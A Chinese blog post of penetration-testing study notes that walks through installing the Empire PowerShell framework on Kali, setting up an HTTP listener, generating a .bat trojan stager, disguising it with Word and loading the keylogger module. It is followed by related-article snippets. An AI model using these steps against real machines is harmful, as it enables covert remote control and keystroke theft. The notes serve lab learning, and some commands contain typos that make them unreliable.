网络渗透测试之帝国笔记

最新推荐文章于 2023-12-16 16:35:46 发布
最新推荐文章于 2023-12-16 16:35:46 发布
阅读量171 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67855254/article/details/124867725
版权

一.Empire 介绍

Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测和大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。

二.下载帝国的三个方法
1.1 window中通过网站下载
Releases · EmpireProject/Empire · GitHub
使用empire2.5版本,不是所有电脑都适用(kali)

1.2 kali中直接下载
(root账号下执行命令)
git clone https://github.com/BC-SECURITY/Empire   #下载帝国cd  Empire

 

 查看python环境

python

python2

退出python环境1.3 kali中通过powershell安装


1.3.在kali中通过powershell进行下载

sudo apt install powrshell-empire #安装帝国

 

 powershell-empire server #开启服务

 

powershell-empire client #开启客户端

 

 三.监听命令
3.1监听http
 listeners #进入监听界面

 

 #进入http监听模式

 

 3.2 ipconfig查看虚拟机ip(监听者)

输入ipconfig进行查看

 


 3.3设置监听
set Name text1 #设置一个监听

set Host 192.168.48.128/9999

set Port 9999

execute #回到监听页面

 

list / listeners

 3.4 木马
3.4.1 生成bat类型的木马
uselistener

usestager

windows/launcher_bat 

 

 

 

info #查看一些基本信息

 set Listener text1 #设置你想使用哪个监听线程

 

按照路径提示找木马文件

agents #查看监听状态i

interact 代理名称 #连接操作系统

 复制生成的木马发送到主机桌面

bat可以使用word进行伪装

 3.4.2 监听键盘 
usemodule  powershell/collection/keylogger

 

L 静
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全渗透测试20w字全套笔记
08-25
PHP-FPM之RCE PHPstudy后门 IIS写权限 绕过WAF 数据库 命令执行 CmdHijack Fuzz目录 web程序漏洞 编辑器漏洞 邮件地址payload 从LFI到RCE Web server日志分析命令 默认密码 wso2 未授权访问 Redis activemq docker ...
网络渗透测试基础之帝国202105110124郭静
weixin_67854030的博客
05-18 380
1.下载帝国的三个方法 1.1 window中通过网站下载 Releases · EmpireProject/Empire · GitHub 使用empire2.5版本,不是所有电脑都适用(kali) 1.2 kali中直接下载 (root账号下执行命令) git clone https://github.com/BC-SECURITY/Empire#下载帝国cdEmpire 查看python环境 python python2 退出python环境1.3 kali中通过powers...
kali 2021.2怎么安装渗透测试框架工具Empire?
u013930899的博客
05-12 2117
1. Empire介绍 Empire是一款针对Windows平台的、使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powershell.exe就可运行PowerShell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,并且能够躲避网络检测和大部分安全防护工具的查杀,简单来说有点类似于Metasploit,是一个基于PowerShell的远程控...
kali python版本回退
qq_30895747的博客
03-16 461
kali python版本切换
Kali Linux 2022.2 python3.10 回退 python3.8
qq_47875210的博客
08-25 6807
参考链接:https://devguide.python.org/getting-started/setup-building/#linux。路径下缺少lsb_release.py文件(具体报错路径查看自己电脑报错路径),解决方法。上面的命令需要一些时间的,这个根据个人网速。kali python2没有pip的问题。按ESC,输入:wq回车退出。
在linux的终端怎么退出python命令行
丿灬安之若死
07-23 4711
1.Ctrl + d 相信这个快捷键在很多交换式情景下都能退出交换式模式。 2.quit()或者exit(),在很多交换式模式下是通过quit命令退出,在python的交换式模式所有命令都是函数,不能漏掉后面的()。 3.输入 exit() 运行或按 Ctrl + D,在python shell中输入"exit()"即可退出python交互界面,1 0ctrl-c就行或者quit()有提示的。 ...
网络安全-渗透完整笔记
03-27
网络安全中的渗透测试是一种合法的、经过授权的模拟黑客攻击行为,旨在评估并增强网络系统安全性。渗透测试通过发现和利用系统中的弱点、技术缺陷或漏洞,帮助企业和组织识别潜在的安全风险,确保网络防御机制的有效...
渗透测试学习笔记之案例一.pdf
04-06
### 渗透测试学习笔记之案例一 #### 1. 前言 在渗透测试领域,持续的技术积累和实战经验分享对于个人成长至关重要。本文档记录了一个具体的渗透测试案例,旨在通过实战演练来加深对渗透测试技术的理解,并为后续的...
读书笔记之python渗透测试.docx
最新发布
04-13
### 读书笔记之Python渗透测试知识点汇总 #### 黑盒测试工具 1. **Burp Suite**:一种常用的集成平台,用于执行Web应用程序的安全测试。它包含多种工具,如Proxy、Intruder、Spider等,可以帮助用户发现并利用Web...
网络渗透测试实验四
babywhale_bi的博客
12-13 3998
网络渗透测试实验报告 实验目的 通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用,系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/ 实验工具:不限 实验内容、原理 目的:获取靶机Web Developer 文件/roo..
网络渗透测试实验二报告
m0_74300881的博客
12-16 364
的工具,是一款用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如 DES 、 MD4 、 MD5 等。进行字典攻击就需要字典,而字典中含有各种密码、用户名,一一匹配进行登录尝试,所以字典就需要很庞大进行尝试,所以合适的字典就会增大破解的可能性,也会减少破解效率和时间,故而字典也是字典攻击里面最重要的一环。那么,口令的明文是什么?在截获B的数据时,A要对B的数据进行转发给网关,这样B才能恢复上网,不然B被arp欺骗之后不能上网,很快就可以发现问题,如此就需要进行IP代理。
网络安全渗透测试的八个步骤
Button12138的博客
02-14 8119
网络安全渗透测试必看
渗透测试实验一报告
JNpvA的博客
11-02 1727
1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。 2、照片中的女生在哪里旅行? 截图搜索到的地址信息。 3、手机位置定位。通过LAC(Location Area Code,位置区域码)和CID(Cell Identity,基站编号,是个16位的数据(范围是0到65535)可以查询手机接入的基站的位置,从而初步确定手机用户的位置。 获取自己手机的LAC和CID: Android 获取方法:Android: 拨号##46
kali安装empire(简单)
luminous_you的博客
10-14 3594
empire项目地址:https://github.com/BC-SECURITY/Empire/ 本机环境: kali python 3.8 安装: git clone https://github.com/BC-SECURITY/Empire.git 过程提示安装/usr/bin/python3 -m pip install --upgrade pip root@kali:~/Empire# cd setup/ root@kali:~/Empire/setup# ./install.sh root@ka
14、域渗透神器Empire安装和简单使用
Fly_鹏程万里
06-14 6677
1. Empire简介Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents withou...
kali安装empire出现各种缺module问题
weixin_46104215的博客
11-10 1024
注意:empire环境python2(python --version) 1.根据以下步骤下载 empire git clone https://github.com/EmpireProject/Empire.git cd Empire/ cd setup/ sudo ./install.sh 2.安装完后,运行(返回Empire目录下,输入 ./empire) cd .. ./empire 3.爆出没有flask模块,我只是 pip install flask就成功了 4.之后运行又出现
kali wsl安装empire
mtcz91的博客
02-25 358
linux下依赖库的版本问题引起的安装失败:libssl-dev版本问题无法安装 sudo apt-get install aptitude sudo aptitude install libssl-dev https://github.com/EmpireProject/Empire/issues/1321 switch to empire dev branch checkout -b dev origin/dev pcre.h: No such file or directory https://w
怎么退出python
qq_33769308的博客
03-16 4437
windows中python可以使用exit()或者ctrl+z 退出 linux中python可以使用exit()或者使用ctrl+D 退出
BackTrack渗透测试学习笔记概述
"这是一份关于BackTrack渗透测试的学习笔记,由作者IceSn0w编写,旨在分享其在BackTrack使用过程中的经验和技巧。笔记涵盖了Metasploit渗透测试指南、信息收集、身份识别、社会工程学攻击、Metasploit运用层攻击、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值